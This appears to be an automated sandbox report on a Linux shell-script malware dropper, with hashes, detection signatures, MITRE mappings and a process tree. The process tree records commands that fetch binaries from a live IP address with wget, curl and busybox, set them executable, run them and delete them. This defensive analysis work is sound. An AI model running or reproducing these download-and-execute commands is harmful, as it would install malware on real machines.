Analysis
- max time kernel: 32s
- max time network: 52s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 25/10/2024, 01:08
Static task: static1
Behavioral task: behavioral1
- Sample: ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
- Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
- Sample: ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
- Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
- Sample: ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
- Sample: ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
- Resource: debian9-mipsel-20240418-en
General
- Target: ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
- Size: 10KB
- MD5: 28e68f4a8e17f58eb03239953a34f7e6
- SHA1: ab686c91da287340dad814683646a6b42978b168
- SHA256: ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f
- SHA512: ad6c64228000359844d7cbf7134a85387cef19f1f8d10ee5fb2c649958583cabe83458cc1a0785876804db6f37239ce2a7548eca8ad5c6aca61903a7de19b09f
- SSDEEP: 192:W0H2erUorJWr9dhjRxANRbqck7YcxQE/gYXYMpAAd5MUbYsyck7YcvQE/gYRYMp9:W0H2erUorEr9dkQYMpAAd5MUbYsMYMp9
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  755  chmod
  769  chmod
  775  chmod
  787  chmod
  804  chmod
  810  chmod
  681  chmod
  781  chmod
  793  chmod
  761  chmod

- Executes dropped EXE (10 IoCs)
  ioc                                           pid  Process
  /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN      682  eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN
  /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS      756  PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS
  /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE      762  hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE
  /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX      770  7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX
  /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk      776  MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk
  /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p      782  g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p
  /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1      788  qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1
  /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd      795  tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd
  /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk      805  mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk
  /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc      811  tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc

- Checks CPU configuration (1 TTPs, 10 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl

- Reads runtime system information (signature name taken from the process tree below; the table header was missing on the page)
  description              ioc                             Process
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/sys/crypto/fips_enabled   curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/self/auxv                 curl
  File opened for reading  /proc/self/auxv                 curl

- System Network Configuration Discovery (1 TTPs, 6 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid  Process
  662  curl
  671  busybox
  682  eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN
  684  rm
  813  wget
  645  wget

- Writes file to tmp directory (10 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc                                       Process
  File opened for modification  /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS  curl
  File opened for modification  /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk  curl
  File opened for modification  /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p  curl
  File opened for modification  /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd  curl
  File opened for modification  /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN  curl
  File opened for modification  /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE  curl
  File opened for modification  /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX  curl
  File opened for modification  /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1  curl
  File opened for modification  /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk  curl
  File opened for modification  /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc  curl
Processes
(Each entry gives the image path, the command line, the PID, and any signatures the sandbox attached to that process; indentation shows the parent/child depth.)

- /tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh: /tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh (PID 641)
  - /bin/rm: /bin/rm bins.sh (PID 643)
  - /usr/bin/wget: wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN (PID 645)
    signatures: System Network Configuration Discovery
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN (PID 662)
    signatures: Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN (PID 671)
    signatures: System Network Configuration Discovery
  - /bin/chmod: chmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN (PID 681)
    signatures: File and Directory Permissions Modification
  - /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN: ./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN (PID 682)
    signatures: Executes dropped EXE; System Network Configuration Discovery
  - /bin/rm: rm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN (PID 684)
    signatures: System Network Configuration Discovery
  - /usr/bin/wget: wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS (PID 685)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS (PID 692)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS (PID 754)
  - /bin/chmod: chmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS (PID 755)
    signatures: File and Directory Permissions Modification
  - /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS: ./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS (PID 756)
    signatures: Executes dropped EXE
  - /bin/rm: rm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS (PID 757)
  - /usr/bin/wget: wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE (PID 758)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE (PID 759)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE (PID 760)
  - /bin/chmod: chmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE (PID 761)
    signatures: File and Directory Permissions Modification
  - /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE: ./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE (PID 762)
    signatures: Executes dropped EXE
  - /bin/rm: rm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE (PID 763)
  - /usr/bin/wget: wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX (PID 764)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX (PID 765)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX (PID 768)
  - /bin/chmod: chmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX (PID 769)
    signatures: File and Directory Permissions Modification
  - /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX: ./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX (PID 770)
    signatures: Executes dropped EXE
  - /bin/rm: rm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX (PID 771)
  - /usr/bin/wget: wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk (PID 772)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk (PID 773)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk (PID 774)
  - /bin/chmod: chmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk (PID 775)
    signatures: File and Directory Permissions Modification
  - /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk: ./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk (PID 776)
    signatures: Executes dropped EXE
  - /bin/rm: rm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk (PID 777)
  - /usr/bin/wget: wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p (PID 778)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p (PID 779)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p (PID 780)
  - /bin/chmod: chmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p (PID 781)
    signatures: File and Directory Permissions Modification
  - /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p: ./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p (PID 782)
    signatures: Executes dropped EXE
  - /bin/rm: rm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p (PID 783)
  - /usr/bin/wget: wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 (PID 784)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 (PID 785)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 (PID 786)
  - /bin/chmod: chmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 (PID 787)
    signatures: File and Directory Permissions Modification
  - /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1: ./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 (PID 788)
    signatures: Executes dropped EXE
  - /bin/rm: rm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 (PID 789)
  - /usr/bin/wget: wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd (PID 790)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd (PID 791)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd (PID 792)
  - /bin/chmod: chmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd (PID 793)
    signatures: File and Directory Permissions Modification
  - /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd: ./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd (PID 795)
    signatures: Executes dropped EXE
  - /bin/rm: rm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd (PID 796)
  - /usr/bin/wget: wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk (PID 797)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk (PID 802)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk (PID 803)
  - /bin/chmod: chmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk (PID 804)
    signatures: File and Directory Permissions Modification
  - /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk: ./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk (PID 805)
    signatures: Executes dropped EXE
  - /bin/rm: rm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk (PID 806)
  - /usr/bin/wget: wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc (PID 807)
  - /usr/bin/curl: curl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc (PID 808)
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc (PID 809)
  - /bin/chmod: chmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc (PID 810)
    signatures: File and Directory Permissions Modification
  - /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc: ./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc (PID 811)
    signatures: Executes dropped EXE
  - /bin/rm: rm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc (PID 812)
  - /usr/bin/wget: wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG (PID 813)
    signatures: System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1)
    - Linux and Mac File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1)
    - System Checks (1)
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97